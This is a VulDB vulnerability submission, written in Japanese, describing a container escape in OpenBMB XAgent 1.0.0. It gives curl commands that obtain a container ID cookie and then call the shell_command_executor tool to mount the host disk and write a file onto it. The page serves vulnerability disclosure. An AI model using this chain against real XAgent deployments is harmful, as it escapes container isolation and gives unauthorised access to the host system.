| タイトル | OpenBMB XAgent v1.0.0 Container Escapes |
|---|
| 説明 | Docker Enabling Privileged Mode Causes Container Escapes.
1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent)
```bash
git clone https://github.com/OpenBMB/XAgent.git
docker-compose up -d
```
2. Creating Tool Container
```bash
curl -v --request POST 'http://localhost:8080/get_cookie'
...
< HTTP/1.1 200 OK
...
< set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax
...
```
Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx;
3. Execute malicious command escape container
```
curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \
'{
"tool_name":"shell_command_executor",
"arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"}
}'
```
The file created in containers on the host: `cat /boot/hello.txt`. |
|---|
| ソース | ⚠️ https://github.com/OpenBMB/XAgent/issues/386 |
|---|
| ユーザー | zznQ (UID 64000) |
|---|
| 送信 | 2024年02月19日 10:35 (2 年 ago) |
|---|
| モデレーション | 2024年02月29日 14:24 (10 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 255265 [OpenBMB XAgent 1.0.0 Privileged Mode 特権昇格] |
|---|
| ポイント | 20 |
|---|